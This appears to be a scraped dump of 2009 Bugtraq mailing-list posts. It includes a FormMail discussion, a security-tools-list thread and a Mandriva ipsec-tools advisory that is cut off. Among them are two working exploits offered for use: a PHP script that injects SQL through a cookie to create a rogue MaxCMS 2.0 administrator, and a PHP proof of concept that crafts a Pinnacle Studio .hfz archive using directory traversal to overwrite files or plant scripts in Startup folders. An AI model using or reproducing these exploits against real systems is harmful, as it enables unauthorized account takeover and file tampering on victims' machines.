ascii wrote: FormMail 1.92 Multiple Vulnerabilities ... The author's own webpage about formmail mentions the NMS project at the bottom of the page, about which he says: While the free code found at my web site has not evolved much in recent years, the general programming practices and standards of CGI programs have. nms is an attempt by very active programmers in the Perl community to bring the *quality of code for these types of programs up to date and eliminate some of the bad programming practices and bugs* found in the existing Matt's Script Archive code. I would highly recommend downloading the nms versions if you wish to learn CGI programming. The code you find at Matt's Script Archive is not representative of how even I would code these days. *My interests and activies have moved on, however, and I just have not found the time to update all of my scripts*. One of the major reasons for this is that they work for many people. For this reason, I will continue to provide them to the public, but am also *pleased to make you aware of well-coded alternatives*. (my emphasis) which to me looks like he's already addressed the issue by recommending that you use NMS formmail if you care about the quality of the code and any bugs. -- David Cantrell Outcome Technologies Ltd BUPA House, 15-19 Bloomsbury Way, London WC1A 2BA Registered in England, No: 3829851
Re: The security tools list, new version with more than 200 new tools!
Hi Ignace, Your question is very normal. Well, I'm doing in order to have a large referral center for security tools. When you eventually need some tool somewhere, not know any, want to try other tools you use regularly, or have a proprietary tool and want to share with everyone. For all that I think is a good idea to a site that combines the largest and ranked them as best as possible so that it can help in all these cases. The reason for not having added the tools available in backtrack, FIRE, Phlax, Helix, etc, is that, despite the contributions of all you are doing (and I appreciate greatly), almost all the tools I introduced myself by hand. That takes time and that's why I'm going to slowly, because what I do in my spare time. But of course that will introduce all of these tools. Regards El mié, 13-05-2009 a las 11:20 +, Ignace K. Kueviakoé escribió: Hi Ying, I would like to encouge you for what you're doing. And at the same time, I'm wondering why all the soft included in BackTrack do not yet appear in the lists. If there is any raison for that, I'd advise to add those applications from BackTrack and Helix distributions. Regards ignace --- En date de : Mar 12.5.09, Ying ropst...@gmail.com a écrit : De: Ying ropst...@gmail.com Objet: Re: The security tools list, new version with more than 200 new tools! À: Stephen Mullins steve.mullins.w...@gmail.com Cc: bugtraq@securityfocus.com bugtraq@securityfocus.com Date: Mardi 12 Mai 2009, 20h28 Hi Stephen, your welcome. I would like the list for everyone and by everyone. So why is public and accept contributions from anyone who wants to help (help that is very welcome). Regards El mar, 12-05-2009 a las 13:52 -0400, Stephen Mullins escribió: Nice list. Thanks for doing the work to compile that and making it available to the public. On Tue, May 12, 2009 at 9:02 AM, Ying ropst...@gmail.com wrote: Hello everyone, I would like to inform you that the new list of security tools, and the website, has been updated. The changes were: - The information was classified by type and operating system. - I have added new types of tools, adding not only tools but also dictionaries and rainbow tables, for example. Thank you very much for all that have worked with your contributions to the list. I hope you sigais doing. Remembering the URL of site: http://securitytoolslist.domandhost.com Best regards.
Re: FormMail 1.92 Multiple Vulnerabilities
David Cantrell wrote: which to me looks like he's already addressed the issue by recommending that you use NMS formmail if you care about the quality of the code and any bugs. Dear David, telling people to use a different software doesn't automatically fix issues. As we tested FormMail and want to warn people who deployed FormMail and will deploy FormMail we posted an advisory for FormMail. Hope this open your mind. Bye, ascii ush.it
maxcms2.0 creat new admin exploit
?php
print_r('
+---+
maxcms2.0 creat new admin exploit
by Securitylab.ir
+---+
');
if ($argc 3) {
print_r('
+---+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+---+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$name = rand(1,1);
$cmd =
'm_username=securitylab'.$name.'m_pwd=securitylabm_pwd2=securitylabm_level=0';
$resp = send($cmd);
if (!eregi('alert',$resp)) {echo[~]bad!,exploit failed;exit;}
print_r('
+---+
[+]cool,exploit seccuss
[+]you have add a new adminuser securitylab'.$name.'/securitylab
+---+
');
function send($cmd)
{
global $host, $path;
$message = POST .$path.admin/admin_manager.asp?action=add HTTP/1.1\r\n;
$message .= Accept: */*\r\n;
$message .= Referer: http://$host$path\r\n;;
$message .= Accept-Language: zh-cn\r\n;
$message .= Content-Type: application/x-www-form-urlencoded\r\n;
$message .= User-Agent: securitylab\r\n;
$message .= X-Forwarded-For:1.1.1.1\r\n;
$message .= Host: $host\r\n;
$message .= Content-Length: .strlen($cmd).\r\n;
$message .= Cookie:
m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin;
m_level=0;
checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n;
$message .= Connection: Close\r\n\r\n;
$message .= $cmd;
echo $message;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
return $resp;
}
?
Pinnacle Studio 12 Hollywood FX Compressed Archive (.hfz) directory traversal vulnerability poc
?php
/*
Pinnacle Studio 12 Hollywood FX Compressed Archive (.hfz) directory
traversal vulnerability poc
by Nine:Situations:Group::pyrokinesis
Our site: http://retrogod.altervista.org/
Software site: http://www.pinnaclesys.com/
Some keys exported from the registry:
[HKEY_CLASSES_ROOT\.hfz]
@=hfzfile
[HKEY_CLASSES_ROOT\.hfz\hfzfile]
[HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]
[HKEY_CLASSES_ROOT\hfzfile]
@=Hollywood FX Compressed Archive
[HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]
@=C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0
[HKEY_CLASSES_ROOT\hfzfile\shell]
[HKEY_CLASSES_ROOT\hfzfile\shell\Open]
[HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]
@=\C:\\Documents and Settings\\All
Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\
\%1\
command=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\
00,22,00,00,00,00,00
Usually files are decompressed in a Pinnacle effects folder...
Problem is ... that .hfz files can be used to overwrite files on the target
system
or placing scripts in Startup folders by directory traversal attacks
and InstallHFX.exe decompresses them with no prompts!
Just modified an existing .hfz file and here it is the dump ...
Also I experienced some crashes in doing this... investigating...
*/
$path = ..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd;
$payload =
\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00.
\x00\x21\x00\x00\x00\x7e. $path.
\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a.
\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b.
\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04.
\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb.
\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2.
\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51.
\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2.
\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5.
\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99.
\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93.
\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0.
\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3.
\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd
6. \x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27.
\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4.
\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c.
\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc.
\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9.
\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19.
\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5.
\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09.
\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80.
\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26.
\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a.
\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e.
\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97.
\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b.
\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1
\xf4\x69\x09\x3c\x44\x0a\x0b\xff. \x22\x60\x7a\x7a\x3c\x44!
\x01\xe7
\x86\x0d\x33\xe4\x29\x56\xf7\x01.
\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3.
\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b.
\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48.
\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32.
\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef.
\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91.
\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90.
\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08.
\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65.
\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf.
\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c.
\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac.
\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78.
\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54. \x
82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c.
\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f.
[ MDVSA-2009:112 ] ipsec-tools
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:112 http://www.mandriva.com/security/ ___ Package : ipsec-tools Date: May 13, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0 ___ Problem Description: racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote attackers to cause a denial of service (crash) via crafted fragmented packets without a payload, which triggers a NULL pointer dereference (CVE-2009-1574). Updated packages are available that brings ipsec-tools to version 0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous bugfixes over the previous 0.7.1 version, and also corrects this issue. ipsec-tools for Mandriva Linux Corporate Server 4 has been patched to address this issue. Additionally the flex package required for building ipsec-tools has been fixed due to ipsec-tools build problems and is also available with this update. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574 ___ Updated Packages: Mandriva Linux 2008.1: d9878eb00cd2eab1ddab465ae1cc77d4 2008.1/i586/flex-2.5.33-3.1mdv2008.1.i586.rpm 9f806b3e098e21f478cbe7b342c4788d 2008.1/i586/ipsec-tools-0.7.2-0.1mdv2008.1.i586.rpm 417be6a91d0f9959adde599b31281e18 2008.1/i586/libipsec0-0.7.2-0.1mdv2008.1.i586.rpm ddea0f917e8c20428f8f82e6bc5fc84f 2008.1/i586/libipsec-devel-0.7.2-0.1mdv2008.1.i586.rpm 2df69acaabd5b1bd4ae9559b50a2fe38 2008.1/SRPMS/flex-2.5.33-3.1mdv2008.1.src.rpm 073dd7f429789e991ce2140ae94dc9e3 2008.1/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 7540e1692e011f5751b70ca5f813d30e 2008.1/x86_64/flex-2.5.33-3.1mdv2008.1.x86_64.rpm e3b5eaafbfbb853fc8570b57bd24ca8f 2008.1/x86_64/ipsec-tools-0.7.2-0.1mdv2008.1.x86_64.rpm bed8cf24ce2d9f7e0762330f03fe9f77 2008.1/x86_64/lib64ipsec0-0.7.2-0.1mdv2008.1.x86_64.rpm 6d9a2a1a75c2541556c8961f50a8db44 2008.1/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2008.1.x86_64.rpm 2df69acaabd5b1bd4ae9559b50a2fe38 2008.1/SRPMS/flex-2.5.33-3.1mdv2008.1.src.rpm 073dd7f429789e991ce2140ae94dc9e3 2008.1/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.1.src.rpm Mandriva Linux 2009.0: ed0510b3f70d276a944a1d08dd2d8cc1 2009.0/i586/flex-2.5.35-2.1mdv2009.0.i586.rpm 05d955250a465bf3db080b3030601169 2009.0/i586/ipsec-tools-0.7.2-0.1mdv2009.0.i586.rpm ced5cda86b12e2fab5c1bbcccda4712f 2009.0/i586/libipsec0-0.7.2-0.1mdv2009.0.i586.rpm 7dc487599f48ba11d5ce532949854afd 2009.0/i586/libipsec-devel-0.7.2-0.1mdv2009.0.i586.rpm d2f12938586e4487a63cd930b8766f3c 2009.0/SRPMS/flex-2.5.35-2.1mdv2009.0.src.rpm 151ae87db743b0cae0eaa30edd4bf0db 2009.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 11f863a96976eae23b36b2d84b88bc05 2009.0/x86_64/flex-2.5.35-2.1mdv2009.0.x86_64.rpm 171ef0199e2cb79c5c8e9577fd4eab0b 2009.0/x86_64/ipsec-tools-0.7.2-0.1mdv2009.0.x86_64.rpm 9e30ebce0b6cda0ca64282e84e19bab7 2009.0/x86_64/lib64ipsec0-0.7.2-0.1mdv2009.0.x86_64.rpm d94c59428164d08cc73a65b45a936b89 2009.0/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2009.0.x86_64.rpm d2f12938586e4487a63cd930b8766f3c 2009.0/SRPMS/flex-2.5.35-2.1mdv2009.0.src.rpm 151ae87db743b0cae0eaa30edd4bf0db 2009.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2009.0.src.rpm Mandriva Linux 2009.1: e99fc0e432bcf6d8d6bda9099ebf1fe5 2009.1/i586/flex-2.5.35-3.1mdv2009.1.i586.rpm 7e91d7a68657858af9c54a12c4fb8464 2009.1/i586/ipsec-tools-0.7.2-0.1mdv2009.1.i586.rpm 8dd23d6335cf66b6fd3dad3695450495 2009.1/i586/libipsec0-0.7.2-0.1mdv2009.1.i586.rpm 75ba0568d29e9c5963f6d0a829dd5399 2009.1/i586/libipsec-devel-0.7.2-0.1mdv2009.1.i586.rpm 1179bd2ca09c92a74c53dd968d42dd41 2009.1/SRPMS/flex-2.5.35-3.1mdv2009.1.src.rpm 27805cc0683e81278c07ad042cd699f6 2009.1/SRPMS/ipsec-tools-0.7.2-0.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: b6cfd4de694b49af45bb4a393d442132 2009.1/x86_64/flex-2.5.35-3.1mdv2009.1.x86_64.rpm 34542c4ab11123ca26d66d54f20b7785 2009.1/x86_64/ipsec-tools-0.7.2-0.1mdv2009.1.x86_64.rpm cfa784d23e7d386683129e12efe500a6 2009.1/x86_64/lib64ipsec0-0.7.2-0.1mdv2009.1.x86_64.rpm cb931729a533fe7accbc894fe4417ed0 2009.1/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2009.1.x86_64.rpm 1179bd2ca09c92a74c53dd968d42dd41 2009.1/SRPMS/flex-2.5.35-3.1mdv2009.1.src.rpm 27805cc0683e81278c07ad042cd699f6 2009.1/SRPMS/ipsec-tools-0.7.2-0.1mdv2009.1.src.rpm Corporate 4.0: 7b0e5364626bc882bc3cdcd6b9c26f13 corporate/4.0/i586/ipsec-tools-0.6.5-2.3.20060mlcs4.i586.rpm 809b36a5a2edad597edd1249c0b5950c corporate/4.0/i586/libipsec0-0.6.5-2.3.20060mlcs4.i586.rpm 88949442ee4678ed0f6327d8427da16c
